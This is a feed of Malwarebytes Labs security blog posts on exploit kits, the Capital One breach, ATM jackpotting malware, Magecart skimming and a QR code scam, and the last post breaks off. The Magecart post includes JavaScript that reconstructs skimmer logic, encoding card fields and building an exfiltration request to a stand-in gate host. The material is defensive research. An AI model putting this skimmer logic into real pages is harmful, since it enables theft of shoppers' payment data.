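Note that ngrok has plenty of legitimate uses, so a hit here is a lead to investigate, not an automatic block.
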

Flash exploit and payload

At the time of writing, Lord EK only goes after Flash Player vulnerabilities, not Internet Explorer ones. Nao_Sec quickly studied the exploit and pointed out that it targets CVE-2018-15982.

After exploiting the vulnerability, it launches shellcode to download and execute its payload:

The initial payload was njRAT; however, the threat actors swapped it the next day for the ERIS ransomware, as spotted by @tkanalyst.

We also noticed another change where after exploitation happens, the exploit kit redirects the victim to the Google home page. This is a behavior that was previously noted with the Spelevo exploit kit.

Under active development

It is still too early to say whether this exploit kit will stick around and make a name for itself. However, it is clear that its author is actively tweaking it.

This comes at a time when exploit kits are full of surprises and regaining some attention among the research community. Even though the vulnerabilities for Internet Explorer and Flash Player have been patched and both products have a very small market share, usage of the old Microsoft browser still continues in many countries.

Brad Duncan from Malware Traffic Analysis has posted some traffic captures for those interested in studying this exploit kit.

Indicators of Compromise

Compromised site


Network fingerprinting


Lord EK URI patterns




Eris ransomware


The post Say hello to Lord Exploit Kit appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Capital One breach exposes over 100 million credit card applications

Malwarebytes - Fri, 08/02/2019 - 16:00

Just as we were wrapping up the aftermath of the Equifax breach—how was that already two years ago?—we are confronted with yet another breach of about the same order of magnitude.

Capital One was affected by a data breach in March. The hacker gained access to information related to credit card applications from 2005 to early 2019 for consumers and small businesses. According to the bank, the breach affected around 100 million people in the United States and about 6 million in Canada.

What’s very different in this breach is that a suspect has already been apprehended. On top of that, the suspect admitted she acted illegally and disclosed the method she used to get hold of the data. From the behavior of the suspect you would almost assume she wanted to get caught. She put forth only a minimal effort to hide her identity when she talked about having access to the data, almost bragging online about how much she had been able to copy.

What happened?

A software engineer formerly employed by Amazon Web Services (AWS), the cloud hosting company that Capital One uses, was storing the information she gained from the breach in a publicly accessible repository. From the court filings, we may conclude that Paige Thompson combined her hands-on knowledge of how AWS works with the exploitation of a misconfigured web application firewall. As a result, she was able to copy large amounts of data from Capital One's AWS buckets. She posted about having this information on several platforms, which led to someone reporting the fact to Capital One, prompting the investigation of the breach and the arrest of the suspect.

How should Capital One customers proceed?

Capital One has promised to reach out to everyone potentially affected by the breach and to provide free credit monitoring and identity protection services. While Capital One stated that no log-in credentials were compromised, it wouldn’t hurt to change your password if you are a current customer or recently applied for a credit card with the company. For other useful tips, you can read our blog post about staying safe in the aftermath of the Equifax breach, where you will find a wealth of advice for staying out of the worst trouble. Also be wary of the usual scams that will pop up online as spin-offs from this breach.

What can other companies learn from this incident?

While the vulnerability has been fixed, there are other lessons to be learned from this incident.

While it is impractical for companies the size of Capital One to run their own web services, we can ask ourselves whether all of this sensitive information needs to be stored in a place where we do not have full control. Companies like Capital One use these hosting services for scalability, redundancy, and protection. One of the perks is that employees all over the world can access, store, and retrieve any amount of data. This can also be a downside in cases of disgruntled employees or misconfigured Identity and Access Management (IAM) services: Anyone who can successfully impersonate an employee with access rights can use the same data for their own purposes. Amazon Elastic Compute Cloud (EC2) is a web-based service that allows businesses to run application programs in the AWS public cloud. When you run the AWS Command Line Interface from within an Amazon EC2 instance, you can simplify providing credentials to your commands. From the court filings, it looks as if this is where the vulnerability was exploited.

Companies using AWS and similar cloud hosting services should pay attention to:

  • IAM provisioning: Be restrictive when assigning IAM roles so access is limited to those that need it and taken away from those that no longer need it.
  • Instance metadata: Limit access to EC2 metadata as these can be abused to assume an IAM role with permissions that do not belong to the user.
  • Comprehensive monitoring: While monitoring is important for every server and instance that holds important data, it is imperative to apply extra scrutiny to those that are accessible via the Internet. Alarms should have gone off as soon as Tor was used to access the EC2 instance.
  • Misconfigurations: If you do not have the in-house knowledge, or want to double-check, there are professional services that can scan for misconfigured servers.
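
The instance metadata point above boils down to one idea: a bare GET request forwarded by a confused server-side proxy should not be enough to hand out credentials. Here is a toy sketch of that token-gating idea; the class and header names are invented for illustration and this is not the real AWS API:

```python
import secrets

# Toy illustration of gating instance metadata behind a session token,
# so a bare GET forwarded by a misconfigured proxy (the SSRF pattern
# described in the court filings) is refused. All names are invented
# for this sketch; this is not the real AWS metadata API.
class MetadataGuard:
    def __init__(self):
        self._tokens = set()

    def issue_token(self):
        # Stands in for a call only code on the instance itself can
        # make, so only the instance ever holds a valid token.
        token = secrets.token_hex(16)
        self._tokens.add(token)
        return token

    def allow(self, headers):
        # Reject any metadata request lacking a known session token.
        return headers.get("X-Metadata-Token") in self._tokens

guard = MetadataGuard()
token = guard.issue_token()
print(guard.allow({"X-Metadata-Token": token}))  # → True
print(guard.allow({}))                           # → False
```

A proxy tricked into fetching the metadata URL would forward the attacker’s headers, not a locally issued token, so the request in the second call fails.
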

Ironically, Capital One has released some very useful open source tools for AWS compliance and has proven to have the in-house knowledge. Capital One has always leaned more toward the fintech side than most traditional banks, and it was an early adopter of the cloud. So the fact that this breach happened to them is rather worrying, as we would expect other banks to be even more vulnerable.

Stay posted

Even though we already know a lot more details about this data breach than usual, we will keep following this one as it further unfolds.

If you want to follow up directly with a few resources, you can click below:

Official Capital One statement

Paige Thompson Criminal Complaint

The post Capital One breach exposes over 100 million credit card applications appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Everything you need to know about ATM attacks and fraud: part 2

Malwarebytes - Fri, 08/02/2019 - 15:00

This is the second and final installment of our two-part series on automated teller machine (ATM) attacks and fraud.

In part 1, we identified the reasons why ATMs are vulnerable, from inherent weaknesses in their frames to their software, and delved deep into two of the four kinds of attacks against them: terminal tampering and physical attacks.

Terminal tampering has many types, but it involves either physically manipulating components of the ATM or introducing other devices to it as part of the fraudulent scheme. Physical attacks, on the other hand, cause destruction to the ATM and to the building or surrounding area where the machine is situated.

We have also supplied guidelines for users—before, during, and after—that will help keep them safe when using the ATM.

For part 2, we’re going to focus on the final two types of attacks: logical attacks and the use of social engineering.

Logical ATM attacks

As ATMs are essentially computers, fraudsters can and do use software as part of a coordinated effort to gain access to an ATM’s computer, its components, or its financial institution’s (FI’s) network. They do this, firstly, to obtain cash; secondly, to retrieve sensitive data from the machine itself and from stripe or chip cards; and lastly, to intercept data they can use to conduct fraudulent transactions.

Enter logical attacks—a term synonymous with jackpotting or ATM cash-out attacks. Logical attacks involve the exploitation and manipulation of the ATM’s system using malware or another electronic device called a black box. Once cybercriminals gain control of the system, they direct it to essentially spew cash until the safe empties as if it were a slot machine.

The concept of “jackpotting” became mainstream after the late renowned security researcher Barnaby Jack presented and demoed his research on the subject at the Black Hat security conference in 2010. Many expected ATM jackpotting to become a real-world problem since then. And, indeed, it has—in the form of logical attacks.

In order for a logical attack to be successful, access to the ATM's internals is needed. A simple way to get it is to use a tool, such as a drill, to make an opening in the casing so criminals can introduce another piece of hardware (a USB stick, for example) to deliver the payload. Some tools can also be used to pinpoint vulnerable points within the ATM’s frame or casing, such as an endoscope, a medical device with a tiny camera that is used to probe inside the human body.

If you think that logical attacks are too complex for the average cybercriminal, think again. For a substantial price, anyone with cash to spare can visit Dark Web forums and purchase ATM malware complete with easy how-to instructions. Because the less competent ATM fraudsters can use malware created and used by the professionals, the distinction between the two blurs.

Logical attack types

To date, there are two sub-categories of logical attacks fraudsters can carry out: malware-based attacks and black box attacks.

Malware-based attacks. As the name suggests, this kind of attack can use several different types of malware, including Ploutus, Anunak/Carbanak, Cutlet Maker, and SUCEFUL, which we’ll profile below. How they end up on the ATM’s computer or on its network is a matter we should all familiarize ourselves with.

Installed at the ATM’s PC:

  • Via a USB stick. Criminals load up a USB thumb drive with malware and then insert it into a USB port of the ATM’s computer. The port is either exposed to the public or behind a panel that one can easily remove or punch a hole through. As these ATM frames are neither sturdy nor secure enough to counter this type of physical tampering, infecting via USB or external hard drive will always be an effective attack vector. In a 2014 article, SecurityWeek covered an ATM fraud that successfully used a malware-laden USB drive.
  • Via an external hard drive or CD/DVD drive. The tactic is similar to the USB stick but with an external hard drive or bootable optical disk.
  • Via infecting the ATM computer’s own hard drive. The fraudsters either disconnect the ATM’s hard drive and replace it with an infected one, or they remove the hard drive, infect it with a Trojan, and then reinsert it.

Installed at the ATM’s network:

  • Via an insider. Fraudsters can coerce or team up with a bank employee with ill intent toward their employer to do the dirty work for them. The insider gets a cut of the cashed-out money.
  • Via social engineering. Fraudsters can use spear phishing to target certain employees in the bank and get them to open a malicious attachment. Once executed, the malware infects the entire financial institution’s network and its endpoints, including ATMs. The ATM then becomes a slave machine. Attackers can send instructions directly to the slave machine for it to dispense money, and have money mules collect it.

    Note that as criminals are already inside the FI’s network, a new opportunity to make money opens up: They can now break into sensitive data locations to steal information and/or proprietary data that they can further abuse or sell in the underground market.

Installed via Man-in-the-Middle (MiTM) tactics:

  • Via fake updates. Malware could be introduced to ATM systems via a bogus software update, as explained by Benjamin Kunz-Mejri, CEO and founder of Vulnerability Lab, after he discovered (by accident) that ATMs in Germany publicly display sensitive system information during their software update process. In an interview, Kunz-Mejri said that fraudsters could potentially use the information to perform a MiTM attack to get inside the network of a local bank, run malware made to look like a legitimate software update, and then control the infected ATM.

Black box attacks. A black box is an electronic device—either another computer, mobile phone, tablet, or even a modified circuit board linked to a USB wire—that issues ATM commands at the fraudster’s bidding. The act of physically disconnecting the cash dispenser from the ATM computer to connect the black box bypasses the need for attackers to use a card or get authorization to confirm transactions. Off-premise retail ATMs are likely targets of this attack.

A black box attack could involve social engineering tactics, like dressing up as an ATM technician, to allay suspicions while the threat actor physically tampers with the ATM. At times, fraudsters use an endoscope to locate and disconnect the cash dispenser’s wire from the ATM computer and connect it to their black box. This device then issues commands to the dispenser to push out money.

As this type of attack does not use malware, a black box attack usually leaves little to no evidence—unless the fraudsters left behind the hardware they used, of course.

Experts have observed that as reports of black box attacks have dropped, malware attacks on ATMs are increasing.

ATM malware families

As mentioned in part 1, there are over 20 strains of known ATM malware. We’ve profiled four of those strains to give readers an overview of the diversity of malware families developed for ATM attacks. We’ve also included links to external references you can read in case you want to learn more.

Ploutus. This is a family of ATM backdoor malware first detected in 2013. Ploutus is specifically designed to force the ATM to dispense cash, not steal cardholder information. An earlier variant was introduced to the ATM computer by inserting an infected boot disk into its CD-ROM drive. An external keyboard was also used, as the malware responds to commands executed by pressing certain function keys (F1 to F12). Newer versions also use mobile phones, are persistent, target the most common ATM operating systems, and can be tweaked to be vendor-agnostic.

Daniel Regalado, principal security researcher for Zingbox, noted in a blog post that a modified Ploutus variant called Piolin was used in the first ATM jackpotting crimes in North America, and that the actors behind these attacks are not the same as those behind the jackpotting incidents in Latin America.

References on Ploutus:

Anunak/Carbanak. This advanced persistent malware was first encountered in the wild affecting Ukrainian and Russian banks. It’s a backdoor based on Carberp, a known information-stealing Trojan. Carbanak, however, was designed to siphon off data, perform espionage, and remotely control systems.

The Anunak/Carbanak admin panel (Courtesy of Kaspersky)

It arrives on financial institution networks as an attachment to a spear phishing email. Once in the network, it looks for endpoints of interest, such as those belonging to administrators and bank clerks. As the APT actors behind Carbanak campaigns don’t have prior knowledge of how their target’s systems work, they surreptitiously video record how the admin or clerk uses them. The knowledge gained can then be used to move money out of the bank and into criminal accounts.

References on Anunak/Carbanak:

Cutlet Maker. This is one of several ATM malware families being sold in underground hacking forums. It is actually a kit comprising (1) the malware file itself, named Cutlet Maker; (2) c0decalc, a password-generating tool that criminals use to unlock Cutlet Maker; and (3) Stimulator, another benign tool designed to display information about the target ATM’s cash cassettes, such as the type of currency, the value of the notes, and the number of notes in each cassette.

Cutlet Maker’s interface (Courtesy of Forbes)

References on Cutlet Maker:

SUCEFUL. Hailed as the first multi-vendor ATM malware, SUCEFUL was designed to capture bank cards in the infected ATM’s card slot, read the card’s magnetic stripe and/or chip data, and disable ATM sensors to prevent immediate detection.

The malware’s name is derived from a typo by its creator (it was supposed to be “successful”), as you can see from this testing interface (Courtesy of FireEye)

References on SUCEFUL:

Social engineering

Directly targeting ATMs by compromising their weak points, whether on the surface or inside, isn’t the only effective way for fraudsters to score easy cash. They can also take advantage of the people using the ATMs. Here are the ways users can be socially engineered into handing over hard-earned money to criminals, often without knowing it.

Defrauding the elderly. This has become a trend in Japan. Fraudsters posing as relatives in need of emergency money or government officials collecting fees target elderly victims. They then “help” them by providing instructions on how to transfer money via the ATM.

Assistance fraud. Someone somewhere at some point may have been approached by a kindly stranger in the same ATM queue, offering a helping hand. Scammers use this tactic to memorize their target’s card number and PIN, which they then use to initiate unlawful transactions.

The likely targets for this attack are also the elderly, as well as confused new users who are likely first-time ATM card owners.

Shoulder surfing. This is the act of being watched by someone while you punch in your PIN using the ATM’s keypad. Stolen PIN codes are particularly handy for a shoulder surfer, especially if their target absent-mindedly leaves the area after retrieving their cash but hasn’t fully completed the session. Some ATM users walk away before they can even answer the machine when it asks if they have another transaction. And before the prompt disappears, the fraudster enters the stolen PIN to continue the session.

Eavesdropping. Like the previous point, the goal of eavesdropping is to steal the target’s PIN code. This is done by listening and memorizing the tones the ATM keys make when someone punches in their PIN during a transaction session.

Distraction fraud. This tactic swept through Britain a couple of years ago. The scenario goes like this: An unknowing ATM user gets distracted by the sound of dropping coins behind them while taking out money. They turn around to help the person who dropped the coins, not knowing that someone else is already either stealing the cash the ATM just dispensed or swapping a fake card for their real one. The ATM user looks back at the terminal, content that everything looks normal, then goes on their way. The person they helped, meanwhile, either receives the stolen card from their accomplice or tells the accomplice the stolen card’s PIN, which they memorized when the target punched it in, just before deliberately dropping the coins.

A still taken from Barclays’ public awareness campaign video on distraction fraud (Courtesy of This is Money)

Continued vigilance for ATM users and manufacturers

Malware campaigns, black box attacks, and social engineering are problems that are actively being addressed by both ATM manufacturers and financial institutions. However, that doesn’t mean ATM users should let their guards down.

Keep in mind the social engineering tactics we outlined above when using an ATM, and don’t forget to keep a lookout for something “off” with the machine you’re interacting with. While it’s quite unlikely a user could tell if an information-stealer had compromised her ATM (until she saw the discrepancies in her transaction records later), there are some malware types that can physically capture cards.

If this happens, do not leave the ATM premises. Instead, record every detail related to what happened, such as the time the card was captured, the ATM branch you used, and which transactions you made prior to realizing the card would not eject. Take pictures of the surroundings and the ATM itself, and attempt to discreetly snap any people lingering about. Finally, call your bank and/or card issuer to report the incident and request card termination.

We would also like to point you back to part 1 of this series again, where we included a useful guideline for reference on what to look out for before dropping by an ATM outlet.

As always, stay safe!

The post Everything you need to know about ATM attacks and fraud: part 2 appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Making the case: How to get the board to invest in government cybersecurity

Malwarebytes - Thu, 08/01/2019 - 16:00

Security leaders are no longer simply expected to design and implement a security strategy for their organization. As key members of the business, often sitting in the C-suite, CISOs and security managers must demonstrate business acumen. In fact, Gartner estimates that by 2020, 100 percent of large enterprise CISOs will be asked to report to their board of directors on cybersecurity and technology risk at least annually.

Presenting to the board, demonstrating ROI, and designing security as a business enabler are all in the job description for CISOs today.  But when it comes to communicating with the board and executive management, CISOs in different verticals will have disparate challenges to address.

In a series of posts about CISO communication, we look at these varying issues and concerns across verticals. This month, we examine what security leaders in government positions need to be mindful of when working to get buy-in from higher levels.

For perspective, I tapped Dan Lohrmann. Lohrmann is a security veteran who led Michigan government’s cybersecurity and technology infrastructure teams from May 2002 to August 2014. Now, as CSO and Chief Strategist for Security Mentor, he still writes and comments regularly on the requirements for government cybersecurity officials.

What unique challenges do CISOs working in government have that differ from their peers in the private sector? 

There are many, but I’ll mention three.

First, in government, the people closest to the top executive are almost always political friends/allies of the governor or mayor or other top public sector leader. The majority of these most trusted people were “on the bus” when they ran for office. This means that many top executives literally campaigned with them through primaries and long days of political rallies, gave financially to their campaigns and more. These are the people who are in the “inner circle” and who are listened to the most by government leaders. They have unique access and long-term relationships which are very hard to gain if you were not “on the bus.” There is nothing equivalent in the private sector, because there are not open public elections.

Second, while building trust takes time and skill in both the public and private sectors, the timelines for projects are often different. In government, there are set cycles which tend to follow election calendars, which often run for four years, but can range from two up to six. Investments and priorities with the board—often the cabinet or committee or council—also follow unique budget cycles that include getting legislative and perhaps other support. The timing of requests is paramount. Learn the lingo and metrics of these groups. How do they measure success?

Third, government rules, procedures, processes, approvals, oversight, and audits are often very complex and unique. It can take years to fully understand all the fiefdoms and side deals that occur in government silos. In the private sector, financial or staff support from the top leaders is generally acted upon swiftly. But, in contrast, I have seen government leaders make clear decisions, only to see the “government bureaucracy” kill projects through a long list of internal maneuvers and delaying tactics.

What do government CISOs need to keep in mind when they communicate with either the board or other governing body in their organization?

Know where you stand, not just on the org chart, but in the pecking order of “trust circles” in government. If you are not in the inner circle, and you probably are not if you were not on the bus, ask who is. Also, strive to at least be in the middle circle of career professionals who are trusted to “get things done” and have a track record of career success. Build trusted relationships with those in the inner circle (or at least the middle circle) where possible. Do lunch with the government’s leaders. Learn the top leaders’ priorities and campaign promises. Get invited to the strategy sessions and priority-setting meetings that impact technology and security. Make your case in different ways (from elevator pitches to formal cybersecurity presentations).

Second, gain a good understanding of how things get done in government. Read case studies of successful projects. Learn budget timelines for official (and unofficial) proposals. Always have a list of current needs ready for when "fallout money" becomes available. Side note: I was often told "no money for that project" for months or even years, only to have a budget person come up to me at the end of the fiscal year saying, "I need the spending details now." Lesson: Be ready with your hot-needs list.

Third, get to know the business leaders in the agencies who may be more sympathetic to your cause, even if/when the top elected leaders are not. Find a business champion in your organization who is backing cyber change in powerful ways and get behind that snowplow. Surprisingly, this may not be an IT manager. For example, I’ve seen security champions in the transportation and treasury departments. The senior execs in treasury were in charge of credit cards and needed payment card industry compliance. They pushed for extensive improvements in our network controls by demonstrating the penalties of noncompliance.  

Fourth, do regular cyber roadshows, at least annually, to business areas throughout government. Build a regular cadence for updates on what's happening, and don't assume this is a one-time deal. Go over the good, the bad, the ugly, and the action items in security. Talk about what is working and where improvements are needed, backed by metrics.

Fifth, form a cyber committee (or better, utilize an existing technology sub-committee) to get executive buy-in from middle management in business areas. Get security ambassadors to help make the case through front-line non-IT leaders who are respected.

What tips for effective communication would you offer CISOs in government agencies?

Two tips and a word of caution.

I often hear CISOs and other government leaders say there is no money or hiring, and that their projects never get funded. My response is to "get on the boats leaving the dock." That is, which projects are getting funded? Are you, or your top deputies, in those important meetings? For example, a new tax database is a top priority, but you are not invited to participate. Why not? Make sure security is built into all strategic projects. Build trust by getting involved in top priorities. Or, if you can't beat them, join them.

Another tip is to strategically partner with others. This means building bridges through grants and with other government groups like the MS-ISAC, police, FBI, and DHS. Many of these groups carry established reputations and a level of trust, even when new leaders don't. If you study what has and hasn't worked in the past, you can benefit greatly from these relationships. This can also include relationships with the private sector.

One final word of caution: When a new top leader is elected, the inner circle will inevitably change. Staying effective during this transition, especially if political parties change, is a huge challenge. Nevertheless, cybersecurity is one of the few high-priority topics which tends to be nonpartisan. Stay focused on protecting data and critical infrastructure, and you can survive, even during very difficult administration changes.    

The post Making the case: How to get the board to invest in government cybersecurity appeared first on Malwarebytes Labs.

Categories: Techie Feeds

No summer break for Magecart as web skimming intensifies

Malwarebytes - Thu, 08/01/2019 - 15:00

This summer, you are more likely to find the cybercriminal groups known as Magecart client-side rather than poolside.

Web skimming, which consists of stealing payment information directly from within the browser, is one of today's top web threats. Magecart, the umbrella name for the groups behind many of these attacks, gained worldwide attention with the British Airways and Ticketmaster breaches, costing the former £183 million ($229 million) in GDPR fines.

Skimmers, sniffers, or swipers (all valid terms used interchangeably over the years) have been around for a long time and fought against mostly on the server side by security companies like Sucuri that perform website remediation.

Today, web skimming is a booming business comprised of numerous different threat groups, ranging from mere copycats to more advanced actors. During the past few months, we have witnessed a steady increase in the number of hacked e-commerce sites and skimming scripts. In this post, we share some statistics on web skimming based on our telemetry, as well as what Malwarebytes is doing to protect online shoppers from this threat.

65K theft attempts blocked in July

During the past few months, we have observed a growing number of blocks related to skimmer domains and exfiltration gates. This activity increased drastically as summer rolled in, most notably with peaks around July 4 (Figure 1).

Figure 1: Web blocks for skimmer domains and gates recorded in our telemetry

In the month of July alone, Malwarebytes blocked over 65,000 attempts to steal credit card numbers via compromised online stores. Fifty-four percent of those shoppers were from the United States, followed by Canada with 16 percent and Germany with 7 percent, as seen in Figure 2.

Figure 2: Top 10 countries for Magecart activity in July

In addition to a greater number of compromised e-commerce sites (which oftentimes have been injected with more than one skimmer), we also documented large, ongoing spray-and-pray attacks on Amazon S3 buckets.

Many skimmers, too many groups

Skimmer code can help identify the groups behind these attacks, but doing so is becoming increasingly difficult. For instance, the Inter kit sold on underground markets is used by several different threat actors, and many copycats reuse existing code for their own purposes as well.

Figure 3: Fragments from different skimmer scripts

Having said that, skimmers typically have a similar set of functionalities:

  • Looking at the current page to see if it’s the checkout
  • Making sure developer tools are not in use
  • Identifying form fields by their ID
  • Doing some validation of the data
  • Encoding the data (Base64 or AES)
  • Exfiltrating the data to an external gate or to a drop location on the compromised store
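
Stripped of its obfuscation, that core logic amounts to surprisingly little code. The sketch below is an illustrative reconstruction for defenders, not code from any real skimmer; every function name, form field, and the gate URL are hypothetical, and the DOM access is simulated so the logic can run standalone.

```javascript
// Illustrative reconstruction of typical skimmer logic (hypothetical names and gate URL).
// In a real browser injection, fields would come from document.getElementById and
// exfiltration would use an Image beacon or fetch(); here both are simulated.

// Step 1: only run on the checkout page
function isCheckoutPage(url) {
  return /checkout|payment|billing/i.test(url);
}

// Steps 3 and 4: identify form fields and do minimal validation
function collectFields(fields) {
  const data = {};
  for (const [id, value] of Object.entries(fields)) {
    if (value && value.trim().length > 0) data[id] = value.trim();
  }
  return data;
}

// Step 5: encode the stolen data (Base64 here; some skimmers use AES)
function encodePayload(data) {
  return Buffer.from(JSON.stringify(data)).toString('base64');
}

// Step 6: build the exfiltration request to the criminal-controlled gate
function buildExfilUrl(gate, payload) {
  return `${gate}?d=${encodeURIComponent(payload)}`;
}

// Simulated run against fake form data
const formFields = { cc_number: '4111111111111111', cc_exp: '12/21', cc_cvv: '123' };
if (isCheckoutPage('https://shop.example/checkout')) {
  const payload = encodePayload(collectFields(formFields));
  console.log(buildExfilUrl('https://evil-gate.example/gate.php', payload));
}
```

The takeaway for defenders is step 6: however heavily the script is obfuscated, the stolen data ultimately has to leave for a gate, which is why gate domains make good detection points.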

While some skimmers are simple and easily readable JavaScript code, more and more are using some form of obfuscation. This is an effort to thwart detection attempts, and it also serves to hide certain pieces of information, such as the gates (criminal-controlled servers) that are used to collect the stolen data. Fellow researchers also noted the same for the data exfiltration process, although strange encryption may actually raise suspicions.

Magecart protection, client-side

Combating skimmers ought to start server-side, with administrators remediating the threat and implementing a proper patching, hardening, and mitigation regimen. However, in our experience, a great majority of site owners are either oblivious to the compromise or fail to prevent reinfection.

A more effective approach consists of filing abuse reports with CERTs and working with partners to take a more global approach by tackling the criminal infrastructure. But even that is no guarantee, especially when threat actors rely on bulletproof services.

We often get asked how consumers can protect themselves from Magecart threats. Generally speaking, it's better to stick to large online shopping portals than smaller ones, although even that advice hasn't always held true in the past.

At Malwarebytes, we identify those skimmer domains and exfiltration gates. This means that by blocking one malicious hostname or IP address, we can protect shoppers from dozens, if not hundreds, of malicious or compromised online stores at once.
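
Conceptually, this kind of blocking is just a lookup of each requested hostname against known skimmer infrastructure. A minimal sketch follows; the blocklist entries are made-up placeholders, not real indicators.

```javascript
// Toy model of hostname-based blocking; the entries are hypothetical placeholders.
const blockedHosts = new Set(['skimmer-gate.example', 'fake-cdn.example']);

function shouldBlock(requestUrl) {
  try {
    const { hostname } = new URL(requestUrl);
    return blockedHosts.has(hostname);
  } catch {
    return false; // not a valid URL; nothing to block
  }
}

console.log(shouldBlock('https://skimmer-gate.example/gate.php')); // true
console.log(shouldBlock('https://legit-shop.example/cart'));       // false
```

Blocking a single gate hostname this way covers every store injected with a script that calls home to it, which is why it scales better than cleaning compromised sites one at a time.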

In Figure 4, we see how Malwarebytes intercepts a skimmer that had been injected into the website for Pelican Products before the customer entered their information. (We reported this breach to Pelican, and it appears that the site is now clean.)

Figure 4: Magecart theft attempt blocked in real time

The recent headlines about data breaches have eroded people's trust in entering personal information online. And yet, many myths persist and give a false sense of security. For example, neither the trust seals many merchants proudly display nor their use of digital certificates (HTTPS) will protect you from a Magecart attack.

There is no doubt that Magecart threat actors, despite their diversity, are in it for the long game. Because the attack surface is quite vast, we are bound to observe new schemes in the near future.

The post No summer break for Magecart as web skimming intensifies appeared first on Malwarebytes Labs.

Categories: Techie Feeds

QR code scam can clean out your bank account

Malwarebytes - Wed, 07/31/2019 - 16:05

“Excuse me sir, can I ask you for a favor? I want to pay for parking my car in this spot, but there are no machines around that accept cash. If I give you five dollars in cash, can you pay the parking for me? All you need to do is scan this QR code with your banking app.”

Of course, John felt the need to help this person, but since no good deed goes unpunished, he came home only to find that every penny he had in his bank account had vanished. So, all he had to last him through the rest of the month was the fiver in his wallet.

A week ago, one of the Netherlands' local police departments issued a warning that this type of scam was making the rounds. Meanwhile, two suspects have been apprehended after scamming dozens of people out of tens of thousands of euros.

As far as the police know, these scammers have been active in two cities so far. They left the first city behind when the police started handing out flyers about the parking scam, and they were caught red-handed in the second. It may have helped that some of the potential victims had read the warnings police posted on social media, which were issued alongside warning signs in the parking lots and flyers that described the scammers and asked anyone who saw them at work to call the police.

But in case criminals using this tactic are active in other European or US cities, we wanted to bring this particular scam to light.

What is a QR code exactly?

A QR (Quick Response) code is nothing more than a two-dimensional barcode. This type of code was designed to be read by machines that keep track of items produced in a factory. As a QR code takes up a lot less space than a legacy barcode, its usage soon spread.

Modern smartphones can easily read QR codes, as a camera and a small piece of software is all it takes. Some apps, like banking apps, have QR code-reading software incorporated to make it easier for users to make online payments. In other cases, QR codes are used as part of a login procedure.

QR codes are easy to generate and hard to tell apart from one another. To most human eyes, they all look the same.


Even if we can spot any differences, we are unable to see what they stand for, exactly. And that is exactly what this scam banks on. To us, they all look the same—one payment instruction for five dollars looks just like any other.

How does this scam work?

Basically, it works the same way as entering your login credentials on a banking phishing site. The scammers used social engineering to con victims into scanning the scammers' QR code with their own banking app. By doing so, the victims handed over the login credentials to their banking environment.

With those in hand, it’s easy for the threat actors to make some payments on your behalf—into accounts under their control, obviously. It is likely that they used money mules to convert those payments into cash they could then spend freely without raising suspicion.

Other QR scams

Besides the fake banking environment scam, there have been reports of QR codes that were rigged to download malware onto the victim’s device. Also, criminals have been known to replace public and unguarded QR codes with their own so that payments would flow into their pockets.

For example, in China, where bike-sharing is immensely popular and you pay in advance to unlock a bike, it can be profitable for criminals to replace the QR codes on a large number of bikes with their own. This funnels many small payments into the threat actor's account, and most would-be renters will simply shrug when a bike fails to unlock and move on to the next one to try their luck.

How can I protect myself?

There are a few things users can do to keep safe from QR code scams:

  • If you are using QR codes to make a payment, pay close attention to the details shown to you before you confirm the payment.
  • Use QR code payments only in circumstances that you consider normal. Don’t be rushed or talked into paying in a way that you are not completely familiar with.
  • Alert your bank and work with them to change your credentials as soon as you suspect foul play.
  • Treat a QR code like any other link. Don’t follow it if you don’t know where it originated from, or if you don’t fully trust the source.
  • If you are using a QR code scanner or thinking about installing one, consider using one that uses built-in filters. Or, you can use it in combination with security software that blocks malicious sites, because every QR code scanner I have seen automatically takes users to the link it reads from the QR code.
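
The "treat a QR code like any other link" advice can be made concrete: before acting on a decoded payload, check the scheme and, for payments, the destination host. A rough sketch follows; the trusted host is a made-up example, and a real banking app would pin its own endpoints.

```javascript
// Hypothetical pre-flight check for a decoded QR payload.
// 'bank.example' stands in for whatever host a real banking app expects.
const trustedPaymentHosts = new Set(['bank.example']);

function classifyQrPayload(payload) {
  let url;
  try {
    url = new URL(payload);
  } catch {
    return 'not-a-url'; // plain text, Wi-Fi config, contact card, etc.
  }
  if (url.protocol !== 'https:') return 'reject';       // no http:, javascript:, intent:, ...
  if (trustedPaymentHosts.has(url.hostname)) return 'trusted-payment';
  return 'unknown-link'; // show the full URL and ask the user before opening
}

console.log(classifyQrPayload('https://bank.example/pay?id=123')); // 'trusted-payment'
console.log(classifyQrPayload('http://evil.example/login'));       // 'reject'
```

Anything that does not classify as trusted should be shown to the user in full before it is opened or paid.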

To users, QR codes offer an advantage over having to type out a full URL in a browser address bar on their device. To advertisers, this means a higher conversion rate and no need for URL shorteners.

But QR codes share one problem with shortened URLs: Users cannot immediately see where the link will take them. That is where the problem lies, and that is what gives criminals the chance to abuse the technology.

Luckily for John, his bank reimbursed him for the damages, but you can imagine the hassle he had to go through and how stupid he felt for falling for such a scam. But not every bank in every country will reimburse you fully for being scammed, so other victims may end up drawing the short straw.

Stay safe, everyone!

The post QR code scam can clean out your bank account appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Exploit kits: summer 2019 review

Malwarebytes - Tue, 07/30/2019 - 16:20

In the months since our last spring review, there has been some interesting activity from several exploit kits. While the playing field remains essentially the same, with Internet Explorer and Flash Player as the most commonly exploited pieces of software, it is undeniable that exploit kit authors have made a marked effort to add some rather cool tricks to their arsenal.

For example, several exploit kits are using session-based keys to prevent “offline” replays. This mostly affects security researchers who might want to test the exploit kit in the lab under different scenarios. In other words, a saved network capture won’t be worth much when it comes to attempting to reenact the drive-by in a controlled environment.

The same is true for better detection of virtual machines and network tools (something known as fingerprinting). Combining these evasion techniques with geofencing and VPN detection makes exploit kit hunting more challenging than in previous quarters.

Threat actors continue to buy traffic from ad networks and use malvertising as their primary delivery method. Leveraging user profiling (their browser type and version, country of origin, etc.) from ad platforms, criminals are able to maintain decent load rates (successful infection per drive-by attempts).

Summer 2019 overview
  • Spelevo EK
  • Fallout EK
  • Magnitude EK
  • RIG EK
  • GrandSoft EK
  • Underminer EK
  • GreenFlash EK

Internet Explorer’s CVE-2018-8174 and Flash Player’s CVE-2018-15982 are the most common vulnerabilities, while the older CVE-2018-4878 (Flash) is still used by some EKs.

Spelevo EK

Spelevo EK is the youngest exploit kit, originally discovered in March 2019, but by no means is it behind any of its competitors.

Payloads seen: PsiXBot, IcedID

Fallout EK

Fallout EK is perhaps one of the more interesting exploit kits. Nao_Sec did a thorough writeup on it recently, showing a number of new features in its version 4 iteration.

